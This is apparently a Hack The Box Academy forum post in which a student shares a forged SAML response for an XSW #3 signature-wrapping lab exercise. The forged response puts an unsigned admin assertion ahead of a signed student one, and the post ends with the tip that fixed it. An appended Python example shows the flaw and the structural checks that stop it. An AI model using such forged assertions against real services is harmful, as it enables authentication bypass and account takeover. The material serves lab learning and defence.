Signature Wrapping Attack

Hey super HTB team and students, I’m really struggling with one challenge/section: “Signature Wrapping Attack”.

I’ve spent literally 5 days trying to get the admin authentication for the SAML, but I just can’t make it and I don’t understand exactly why. I even read some academic research papers about this, such as:

https://arxiv.org/pdf/1401.7483
https://arxiv.org/pdf/2106.10460

And also the great Hacktricks article… thanks to that I was trying with the burp extension SAML Raider too without success…

Any tricks or tips? I’ve tried many things manually and with various tools, including the one mentioned above. I’ve tried positioning the evil assertion below, above, and in the same node as the real one, as well as outside the node. I’ve also tried copying and pasting the section code as is and making minor changes, but nothing seems to work.


Manually I tried different ways but this should be the main code:

<samlp:Response
	xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
	xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_d958ac4530fdddf976d657214527488607b3aa59f4" Version="2.0" IssueInstant="2024-05-21T09:03:07Z" Destination="http://academy.htb/acs.php" InResponseTo="ONELOGIN_efa0901a71f2d630a4e3a8fe0f9d0516a3395427">
	<saml:Issuer>http://sso.htb/simplesaml/saml2/idp/metadata.php</saml:Issuer>
	<samlp:Status>
		<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
	</samlp:Status>
		<saml:Assertion
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_evilID" Version="2.0" IssueInstant="2024-05-21T09:03:07Z">
		<saml:Issuer>http://sso.htb/simplesaml/saml2/idp/metadata.php</saml:Issuer>
		<saml:Subject>
			<saml:NameID SPNameQualifier="http://academy.htb/" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_a94cd98671a088eecdbdddd6a0aed687cc8ff39467</saml:NameID>
			<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
				<saml:SubjectConfirmationData NotOnOrAfter="2024-05-21T09:08:07Z" Recipient="http://academy.htb/acs.php" InResponseTo="ONELOGIN_efa0901a71f2d630a4e3a8fe0f9d0516a3395427"/>
			</saml:SubjectConfirmation>
		</saml:Subject>
		<saml:Conditions NotBefore="2024-05-21T09:02:37Z" NotOnOrAfter="2024-05-21T09:08:07Z">
			<saml:AudienceRestriction>
				<saml:Audience>http://academy.htb/</saml:Audience>
			</saml:AudienceRestriction>
		</saml:Conditions>
		<saml:AuthnStatement AuthnInstant="2024-05-21T08:45:45Z" SessionNotOnOrAfter="2024-05-21T16:45:45Z" SessionIndex="_34c06cc1124bf2352b486ff09d7c4389fbc16c778f">
			<saml:AuthnContext>
				<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
			</saml:AuthnContext>
		</saml:AuthnStatement>
		<saml:AttributeStatement>
			<saml:Attribute Name="id" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">1</saml:AttributeValue>
			</saml:Attribute>
			<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
			</saml:Attribute>
			<saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">admin@academy.htb</saml:AttributeValue>
			</saml:Attribute>
		</saml:AttributeStatement>
	</saml:Assertion>
	<saml:Assertion
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_0c592e159137c0761c00b520ad5bb0ac2749166593" Version="2.0" IssueInstant="2024-05-21T09:03:07Z">
		<saml:Issuer>http://sso.htb/simplesaml/saml2/idp/metadata.php</saml:Issuer>
		<ds:Signature
			xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
			<ds:SignedInfo>
				<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
				<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
				<ds:Reference URI="#_0c592e159137c0761c00b520ad5bb0ac2749166593">
					<ds:Transforms>
						<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
						<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
					</ds:Transforms>
					<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
					<ds:DigestValue>JpZMdnjXGKIKScnccm7Pc2H65cvxOgD5Zz8NEFS4Ars=</ds:DigestValue>
				</ds:Reference>
			</ds:SignedInfo>
			<ds:SignatureValue>IEzaZwANZxQSv/VjqDbTvLJ8M+sRXSQ8CxGG2GbIXFU68mQRbYTBU7Fs7SEtEEwcPTKKvY7B8/gwB3GcewRNAm/TFfL4g0q4Y7EZryrCIHPwHnLYPT0/fudwB3YSClUZGeANMChov5ie1L62bp88AVa2KwlxK6QuV5lrdt34jEAMvpWHJ0+0nYHFCKFaGf3O2QnCjpoFzYxezLCZWs+iR+4CdmWRgztIP7LcGOi70UcyKEj4qn2a6BCk4gV1M5Sh/X3Eia6xpHAgxLzD6LCud/tn8etexCUWobYfhMUeW5ilk9hDBemcFsPnVQgy1rr9aaeTtnCVI0K9iboBNyoPjw==</ds:SignatureValue>
			<ds:KeyInfo>
				<ds:X509Data>
					<ds:X509Certificate>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</ds:X509Certificate>
				</ds:X509Data>
			</ds:KeyInfo>
		</ds:Signature>
		<saml:Subject>
			<saml:NameID SPNameQualifier="http://academy.htb/" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_a94cd98671a088eecdbdddd6a0aed687cc8ff39467</saml:NameID>
			<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
				<saml:SubjectConfirmationData NotOnOrAfter="2024-05-21T09:08:07Z" Recipient="http://academy.htb/acs.php" InResponseTo="ONELOGIN_efa0901a71f2d630a4e3a8fe0f9d0516a3395427"/>
			</saml:SubjectConfirmation>
		</saml:Subject>
		<saml:Conditions NotBefore="2024-05-21T09:02:37Z" NotOnOrAfter="2024-05-21T09:08:07Z">
			<saml:AudienceRestriction>
				<saml:Audience>http://academy.htb/</saml:Audience>
			</saml:AudienceRestriction>
		</saml:Conditions>
		<saml:AuthnStatement AuthnInstant="2024-05-21T08:45:45Z" SessionNotOnOrAfter="2024-05-21T16:45:45Z" SessionIndex="_34c06cc1124bf2352b486ff09d7c4389fbc16c778f">
			<saml:AuthnContext>
				<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
			</saml:AuthnContext>
		</saml:AuthnStatement>
		<saml:AttributeStatement>
			<saml:Attribute Name="id" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">1234</saml:AttributeValue>
			</saml:Attribute>
			<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">htb-stdnt</saml:AttributeValue>
			</saml:Attribute>
			<saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
				<saml:AttributeValue xsi:type="xs:string">student@academy.htb</saml:AttributeValue>
			</saml:Attribute>
		</saml:AttributeStatement>
	</saml:Assertion>
</samlp:Response>

Following XSW #3, but I also tried the other ones…


I’m receiving these kinds of errors:

  • Invalid SAML Response. Not Authenticated.
  • Warning: DOMDocument::loadXML(): Start tag expected, ‘<’ not found in Entity, line: 1 in /var/www/sp/vendor/onelogin/php-saml/src/Saml2/Utils.php on line 87
  • Something went wrong.
  • and others related to a broken XML file or a missing “>” character too

Thank yoooouuuu guys!

In case you are having the same issue… just don’t use XML beautifier and/or change the structure to make it look better.

It is a pain in the ■■■, but edit the SAML request as it is.
Finally!!! :tada::clap::partying_face:
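As an added example (not code from the post, from HTB, or from php-saml), here is the structural check a service provider has to make before trusting attributes from a response laid out like the one above, where an unsigned assertion sits in front of the signed one. The two assertions are constructed, trimmed stand-ins for the ones in the post (IDs shortened, signature value a placeholder); `naive_name` shows what a consumer that simply takes the first `saml:Assertion` ends up with, and `check_signed_assertion` shows the checks that reject that layout.

```python
import xml.etree.ElementTree as ET

NS = {"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
      "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
      "ds": "http://www.w3.org/2000/09/xmldsig#"}

# Constructed, trimmed stand-ins for the two assertions in the post:
# the signed student assertion and the unsigned one carrying admin attributes.
SIGNED = ('<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_0c59" Version="2.0">'
          '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo>'
          '<ds:Reference URI="#_0c59"/></ds:SignedInfo><ds:SignatureValue>PLACEHOLDER</ds:SignatureValue>'
          '</ds:Signature><saml:AttributeStatement><saml:Attribute Name="name">'
          '<saml:AttributeValue>htb-stdnt</saml:AttributeValue></saml:Attribute>'
          '</saml:AttributeStatement></saml:Assertion>')
EVIL = ('<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_evilID" Version="2.0">'
        '<saml:AttributeStatement><saml:Attribute Name="name">'
        '<saml:AttributeValue>admin</saml:AttributeValue></saml:Attribute>'
        '</saml:AttributeStatement></saml:Assertion>')

def response(*assertions):
    return ('<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">'
            + "".join(assertions) + "</samlp:Response>")

WRAPPED = response(EVIL, SIGNED)   # the XSW #3 layout from the post
LEGIT = response(SIGNED)           # what a normal IdP response looks like

def naive_name(xml_text):
    """What a weak SP does: take the first Assertion it finds and trust its attributes."""
    root = ET.fromstring(xml_text)
    return root.find("saml:Assertion/saml:AttributeStatement/"
                     "saml:Attribute[@Name='name']/saml:AttributeValue", NS).text

def check_signed_assertion(xml_text):
    """Structural checks an SP must pass before trusting attributes. Returns (ok, reason).
    Does NOT verify the digest or RSA signature; that must still be done on the
    element this function approves, never on a Signature located separately."""
    root = ET.fromstring(xml_text)
    assertions = root.findall("saml:Assertion", NS)
    if len(assertions) != 1:
        return False, f"expected exactly 1 Assertion, found {len(assertions)}"
    a = assertions[0]
    sig = a.find("ds:Signature", NS)            # signature must be enveloped in it
    if sig is None:
        return False, "consumed Assertion carries no enveloped Signature"
    refs = sig.findall("ds:SignedInfo/ds:Reference", NS)
    if len(refs) != 1 or refs[0].get("URI") != "#" + a.get("ID", ""):
        return False, "Reference URI does not point at the consumed Assertion"
    ids = [e.get("ID") for e in root.iter() if e.get("ID") is not None]
    if ids.count(a.get("ID")) != 1:
        return False, "referenced ID is not unique in the document"
    return True, "consumed Assertion is the signed one"
```

The point of the ID-uniqueness and enveloped-position checks is that a signature reference resolved by ID alone can be satisfied by a copy of the signed element anywhere in the document, which is exactly what the wrapped layout relies on.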